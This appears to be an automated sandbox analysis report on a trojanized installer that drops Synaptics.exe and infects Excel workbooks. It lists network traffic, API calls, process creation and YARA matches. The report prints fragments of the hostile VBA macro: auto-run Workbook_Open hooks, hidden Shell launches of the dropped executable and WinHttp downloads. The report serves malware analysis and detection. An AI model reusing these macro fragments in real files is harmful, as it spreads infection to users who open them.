                              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49803 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49804 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49805 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49824 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49825 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49844 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49842 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49865 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49868 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49890 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49891 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49900 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49903 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49902 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49901 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49924 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49927 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49946 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49949 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49959 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49961 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49985 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49988 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50007 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50012 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50023 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50022 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50034 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50033 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50044 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50046 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50063 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50064 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50073 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50075 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50076 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50074 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50083 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50086 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50115 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50116 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50123 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50126 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50133 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50134 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50143 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50144 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50145 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50147 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50149 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50155 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50157 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50165 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50166 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50170 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50171 version: TLS 1.2

                              System Summary

                              barindex
                              Document contains an embedded VBA macro with suspicious strings
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Document contains an embedded VBA with functions possibly related to ADO stream file operations
                              Source: ofbduaaa.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: NHPKIZUUSG.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Document contains an embedded VBA with functions possibly related to HTTP operations
                              Source: ofbduaaa.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: NHPKIZUUSG.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                              Source: ofbduaaa.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: NHPKIZUUSG.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01003972 OpenEventA,WaitForSingleObject,CloseHandle,Sleep,LoadLibraryA,GetProcAddress,WaitForSingleObject,GetLastError,InitiateSystemShutdownA,GetLastError,WaitForSingleObject,GetLastError,GetVersionExA,GetVersionExA,GetVersionExA,GetSystemDirectoryA,strchr,CreateFileA,FlushFileBuffers,CloseHandle,NtShutdownSystem,FreeLibrary,2_2_01003972
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100358B NtOpenProcessToken,NtAdjustPrivilegesToken,NtClose,NtClose,2_2_0100358B
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010034F4 NtOpenProcessToken,NtAdjustPrivilegesToken,NtClose,NtClose,2_2_010034F4
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01002B13: GetDriveTypeA,CreateFileA,DeviceIoControl,CloseHandle,2_2_01002B13
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01003972 OpenEventA,WaitForSingleObject,CloseHandle,Sleep,LoadLibraryA,GetProcAddress,WaitForSingleObject,GetLastError,InitiateSystemShutdownA,GetLastError,WaitForSingleObject,GetLastError,GetVersionExA,GetVersionExA,GetVersionExA,GetSystemDirectoryA,strchr,CreateFileA,FlushFileBuffers,CloseHandle,NtShutdownSystem,FreeLibrary,2_2_01003972
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8F4E0D ExitWindowsEx,4_2_6C8F4E0D
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeFile created: C:\Windows\wordpad.INI
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010089062_2_01008906
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100911E2_2_0100911E
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010095582_2_01009558
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010082862_2_01008286
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100859D2_2_0100859D
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01008CC52_2_01008CC5
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6395CBE64_2_6395CBE6
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5ED0644_2_6C5ED064
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5ED81C4_2_6C5ED81C
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5D9A504_2_6C5D9A50
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C929F124_2_6C929F12
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C92A9BE4_2_6C92A9BE
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C90E49E4_2_6C90E49E
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C92A4684_2_6C92A468
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C92C65E4_2_6C92C65E
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8CF7904_2_6C8CF790
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C92B09F4_2_6C92B09F
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C92C00B4_2_6C92C00B
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: ofbduaaa.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: NHPKIZUUSG.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: String function: 6C918B7A appears 109 times
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: String function: 6C8F85BC appears 56 times
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: String function: 6C8F833E appears 579 times
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: String function: 6C8C39AD appears 43 times
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: String function: 6397265B appears 183 times
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: String function: 6C926E1A appears 549 times
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: String function: 6395E8E8 appears 149 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 3860
                              Source: file.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: file.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX3CE.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: SetupResources.dll4.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                              Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: SetupResources.dll1.2.drStatic PE information: No import functions for PE file found
                              Source: SetupResources.dll4.2.drStatic PE information: No import functions for PE file found
                              Source: SetupResources.dll.2.drStatic PE information: No import functions for PE file found
                              Source: SetupResources.dll8.2.drStatic PE information: No import functions for PE file found
                              Source: SetupResources.dll3.2.drStatic PE information: No import functions for PE file found
                              Source: SetupResources.dll6.2.drStatic PE information: No import functions for PE file found
                              Source: SetupResources.dll0.2.drStatic PE information: No import functions for PE file found
                              Source: SetupResources.dll5.2.drStatic PE information: No import functions for PE file found
                              Source: SetupResources.dll2.2.drStatic PE information: No import functions for PE file found
                              Source: SetupResources.dll7.2.drStatic PE information: No import functions for PE file found
                              Source: file.exe, 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs file.exe
                              Source: file.exe, 00000000.00000003.1388831651.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName2 vs file.exe
                              Source: file.exe, 00000000.00000003.1388831651.0000000000D25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSb;( vs file.exe
                              Source: file.exe, 00000000.00000002.1389590131.0000000000D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName2 vs file.exe
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs file.exe
                              Source: ._cache_file.exe, 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcredist_x64.exe~/ vs file.exe
                              Source: ._cache_file.exe, 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameSFXCAB.EXEj% vs file.exe
                              Source: file.exeBinary or memory string: OriginalFileName vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenamevcredist_x64.exe~/ vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameSFXCAB.EXEj% vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameb! vs file.exe
                              Source: ._cache_file.exe.0.drBinary or memory string: OriginalFilenamevcredist_x64.exe~/ vs file.exe
                              Source: ._cache_file.exe.0.drBinary or memory string: OriginalFilenameSFXCAB.EXEj% vs file.exe
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@16/120@11/3
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6396681A __EH_prolog3,GetLastError,GetLastError,SetLastError,SetLastError,FormatMessageW,GetLastError,SetLastError,LocalFree,4_2_6396681A
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8F4DC9 AdjustTokenPrivileges,4_2_6C8F4DC9
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01004F6B InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,CloseHandle,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer,2_2_01004F6B
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6394EFE2 CreateToolhelp32Snapshot,_memset,Process32FirstW,Process32NextW,CloseHandle,4_2_6394EFE2
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6394DBFF __EH_prolog3,CoCreateInstance,SysFreeString,__CxxThrowException@8,SysFreeString,4_2_6394DBFF
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_63967A10 LoadResource,LockResource,SizeofResource,4_2_63967A10
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8EE9B4 ChangeServiceConfigW,4_2_6C8EE9B4
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\._cache_file.exeJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeMutant created: \Sessions\1\BaseNamedObjects\Global\VC_Redist_SetupMutex
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7712
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\ofbduaaa.xlsmJump to behavior
                              Source: Yara matchFile source: file.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX3CE.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\AFWAAFRXKO\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCommand line argument: pJ)4_2_002949C0
                              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: file.exeReversingLabs: Detection: 92%
                              Source: Setup.exeString found in binary or memory: Pre-Installation Warnings:
                              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: C:\Users\user\Desktop\._cache_file.exeProcess created: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess created: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess created: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 3860
